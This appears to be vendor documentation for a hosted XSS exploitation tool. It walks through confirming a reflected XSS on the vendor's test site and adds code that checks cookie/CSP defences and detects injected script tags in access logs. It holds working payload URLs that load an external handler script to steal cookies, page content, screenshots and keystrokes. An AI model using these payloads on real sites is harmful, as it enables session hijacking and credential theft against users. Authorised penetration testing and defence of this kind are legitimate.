If you obtained an XSS (Cross-Site Scripting) in your scan results with the Website Scanner or XSS Scanner, you can use the XSS Exploiter to validate the Attack Vector and obtain proof of concept for these findings.
The Label will be used to identify your handler. Choose something meaningful to you, such as the name of the web application, the organization, a testing scenario, etc.
You can specify which data to extract from the vulnerable web application by exploiting the XSS injection using the Search methods. The available options are:
- Get cookies – Have the script fetch the user’s cookies. The session cookie is commonly stored here; stealing it can be used to impersonate the user and perform actions on their behalf. To do this, you only need to replace your own session cookie with the one taken from the user when accessing the application.
- Get HTML content – Have the script fetch the HTML content of the page the user is on. This includes any modifications caused by user interaction, such as automatic completion of forms or sensitive user data displayed inside an Account Details page.
- Get page screenshot – Have the script fetch a screenshot of the generated page. This is useful when presenting the Proof-of-Concept to non-technical users, as definite visual proof that the private session of another user can be accessed.
- Get keystrokes – Have the script intercept and record the user’s keyboard input. A keylogger is especially useful on pages that request sensitive input, such as login pages. It can retrieve usernames, passwords, specific search terms, or other sensitive data typed by the user that is not yet present when the page finishes loading.
Based on the selected options, the tool generates a JavaScript file that can be publicly accessed at a unique URL. That URL can be embedded in an XSS payload which, when accessed by a browser, leads to the script being loaded and executed, fetching the chosen data and sending it back to the server.
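The generated script depends on two conditions on the target side: a session cookie that JavaScript can read (the "Get cookies" method), and a page that will load a script from an origin other than its own (the handler URL). The following is an added example, not part of the Pentest-Tools.com tool, that checks a set of response headers for both conditions; the header values, the cookie name and the handler origin `https://handler.example` are constructed for the example, and the CSP matcher covers only the common source forms (`*`, scheme sources, host and `*.host` entries, quoted keywords, `'strict-dynamic'`).

```javascript
// Added example (not Pentest-Tools.com code): report whether a response's headers
// leave the page exposed to the two things the generated payload relies on:
//  - a session cookie readable from script ("Get cookies"), i.e. missing HttpOnly
//  - a Content-Security-Policy that still permits a script from an external origin
// Every header value below is constructed; the handler origin is a placeholder.

const HANDLER_ORIGIN = 'https://handler.example'; // placeholder, not a real handler

// Parse one Set-Cookie header value into its name and the attribute flags we care about.
function parseSetCookie(headerValue) {
  const parts = headerValue.split(';').map(p => p.trim());
  const name = parts[0].split('=')[0];
  const attrs = new Set(parts.slice(1).map(p => p.split('=')[0].toLowerCase()));
  return { name, httpOnly: attrs.has('httponly'), secure: attrs.has('secure') };
}

// Return the source list that governs <script src> loads: script-src, else default-src.
function scriptSources(cspValue) {
  if (!cspValue) return null;
  const directives = {};
  for (const d of cspValue.split(';')) {
    const [name, ...values] = d.trim().split(/\s+/).filter(Boolean);
    if (name) directives[name.toLowerCase()] = values;
  }
  return directives['script-src'] || directives['default-src'] || null;
}

// Simplified CSP source matching: would a script from `origin` be allowed to load?
function cspAllowsScriptFrom(sources, origin) {
  if (sources === null) return true;                  // no applicable directive at all
  const lower = sources.map(s => s.toLowerCase());
  // With 'strict-dynamic' the host allowlist is ignored and an injected <script>
  // carries no nonce, so the external script is blocked.
  if (lower.includes("'strict-dynamic'")) return false;
  const url = new URL(origin);
  return lower.some(s => {
    if (s === '*') return true;
    if (s.startsWith("'")) return false;                // keywords, nonces, hashes
    if (s === 'https:') return url.protocol === 'https:';
    if (s === 'http:') return url.protocol === 'http:' || url.protocol === 'https:';
    const m = s.match(/^(?:([a-z]+):\/\/)?([^\/:]+)/); // optional scheme, then host
    if (!m) return false;
    const [, scheme, host] = m;
    if (scheme && `${scheme}:` !== url.protocol) return false;
    if (host.startsWith('*.')) return url.hostname.endsWith(host.slice(1));
    return url.hostname === host;
  });
}

// Combine both checks into a list of findings (empty list = both mitigated).
function assessResponse(headers, handlerOrigin = HANDLER_ORIGIN) {
  const findings = [];
  for (const sc of headers.setCookie) {
    const c = parseSetCookie(sc);
    if (!c.httpOnly) findings.push(`cookie ${c.name} is readable by injected script (no HttpOnly)`);
  }
  if (cspAllowsScriptFrom(scriptSources(headers.csp), handlerOrigin)) {
    findings.push(`page may load a script from ${handlerOrigin} (script-src does not block it)`);
  }
  return findings;
}

// Constructed responses: no protections, a permissive CSP, and a hardened configuration.
const WEAK_RESPONSE = { setCookie: ['PHPSESSID=constructed123; Path=/'], csp: null };
const PERMISSIVE_CSP_RESPONSE = {
  setCookie: ['PHPSESSID=constructed123; Path=/; HttpOnly; Secure'],
  csp: "script-src 'self' https:",
};
const HARDENED_RESPONSE = {
  setCookie: ['PHPSESSID=constructed123; Path=/; HttpOnly; Secure; SameSite=Lax'],
  csp: "default-src 'self'; script-src 'self' https://static.example.com",
};

for (const [label, r] of Object.entries({ WEAK_RESPONSE, PERMISSIVE_CSP_RESPONSE, HARDENED_RESPONSE })) {
  console.log(label, assessResponse(r));
}
```

HttpOnly only removes the cookie from what an injected script can read; the HTML content, screenshot and keystroke methods work on the page itself, so the script-src restriction is the control that stops all four at once, and the check above treats a CSP that still allows the handler origin as a finding even when the cookie is protected.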
The tool is capable of fetching the following information:
- Source IP address
- URL Parameters
- User Agent
- All HTTP headers
- Operating system (deduced from the User-Agent)
- Request date
Each XSS Handler is unique. Only you can see the data extracted by your handlers. Nobody else can use your payloads or send data back to your handler unless they know your exact URL.
A handler is active for 60 days. After this time expires, you will still be able to view your results, but the handler will stop logging new requests. Additionally, there is a limit of 500 requests that can be logged per handler.
Here is an example of how to detect and validate an XSS using Pentest-Tools.com.
For this example, we will use our test application, www.pentest-ground.com/private-dev.
To identify the XSS injection with Pentest-Tools.com, we will perform a scan with either Website Scanner or XSS Scanner.
After performing an authenticated scan with Website Scanner on www.pentest-ground.com/private-dev, we obtain the following result:
The finding includes the Attack Vector, which we will exploit. By clicking the ‘Attack Target’ button on the right, we submit the payload. A new tab opens with the following message:
The Attack Vector consists of an identification key (the account number) followed by a URL-encoded script tag containing the JavaScript statement that will run in the web page.
The next step is to generate the XSS handler using the XSS Exploiter. At this step, you can select the Search methods, as previously discussed in the article.
So now we have:
- The Attack vector
http://www.pentest-ground.com/private-dev/payment_history.php?account_no=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
- The XSS handler
https://pentest-tools.com/xss-payload/RpzlItGBOP/
And we need to combine the two into an XSS payload. We get the following result:
http://www.pentest-ground.com/private-dev/payment_history.php?account_no=<script src='https://pentest-tools.com/xss-payload/RpzlItGBOP/'></script>
The rule is to follow the format from the Attack vector and insert the XSS handler in the script section.
We paste the obtained link in the browser. The Keystrokes search method requires keyboard input from the user before it can be validated. A URL can be accessed several times.
And here is the result:
The XSS injection is validated and the handler has extracted the cookies, HTML content, page screenshot and keystrokes.
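The two requests in this walkthrough (the scanner's `alert(1)` attack vector and the payload that loads the handler script) both arrive at the application as a `<script>` tag inside a query parameter, so they leave a recognizable trace in the web server's access log. The following is an added example, not part of Pentest-Tools.com or the test application, that scans combined-format access-log lines for that pattern and distinguishes an inline script from one loading from an external host; the log lines are constructed, and the host `handler.example` and path `/xss-payload/PLACEHOLDER/` stand in for a real handler URL. It also decodes repeatedly, because a doubly percent-encoded payload decodes to something harmless after a single pass.

```javascript
// Added example (not Pentest-Tools.com code): detect reflected-XSS requests like the
// ones in the walkthrough in access-log lines. Sample lines are constructed; the
// handler host/path are placeholders.

const SAMPLE_ACCESS_LOG = [
  // benign request
  '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /private-dev/payment_history.php?account_no=1001 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
  // the scanner's attack vector: inline alert(1)
  '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /private-dev/payment_history.php?account_no=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
  // a payload loading an external handler script (placeholder host)
  '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /private-dev/payment_history.php?account_no=%3Cscript%20src%3D%27https%3A%2F%2Fhandler.example%2Fxss-payload%2FPLACEHOLDER%2F%27%3E%3C%2Fscript%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
  // the same tag percent-encoded three times: one decoding pass sees only %253C...
  '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /private-dev/payment_history.php?account_no=%25253Cscript%25253E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

// Pull the request target (path + query) out of a combined-format log line.
function requestTarget(line) {
  const m = line.match(/"(?:GET|POST|PUT|HEAD) (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Percent-decode until the value stops changing (bounded), so nested encoding is undone.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { break; } // malformed escape: stop
    if (next === current) break;
    current = next;
  }
  return current;
}

// Classify a decoded parameter value: no script tag, inline script, or external script.
function classifyScriptTag(decoded) {
  const tag = decoded.match(/<script\b[^>]*>/i);
  if (!tag) return null;
  const src = tag[0].match(/\bsrc\s*=\s*['"]?([^'"\s>]+)/i);
  if (!src) return { kind: 'inline' };
  try { return { kind: 'external', host: new URL(src[1]).host }; }
  catch { return { kind: 'external', host: src[1] }; }  // relative or malformed src
}

// Run the check over every query parameter of every line and collect findings.
function detectScriptInjection(lines) {
  const findings = [];
  for (const line of lines) {
    const target = requestTarget(line);
    if (!target) continue;
    const url = new URL(target, 'http://log.invalid'); // base only makes the path parseable
    for (const [param, value] of url.searchParams) {  // searchParams already decoded once
      const hit = classifyScriptTag(fullyDecode(value));
      if (hit) findings.push({ client: line.split(' ')[0], path: url.pathname, param, ...hit });
    }
  }
  return findings;
}

for (const f of detectScriptInjection(SAMPLE_ACCESS_LOG)) console.log(f);
```

The external-script case is the one worth alerting on in its own right: an inline `alert(1)` is typically a scanner or a tester confirming reflection, whereas a request that makes the page load a script from a host the application does not use is the shape of the payload built in this walkthrough, and the extracted host gives the responder something to block or look up.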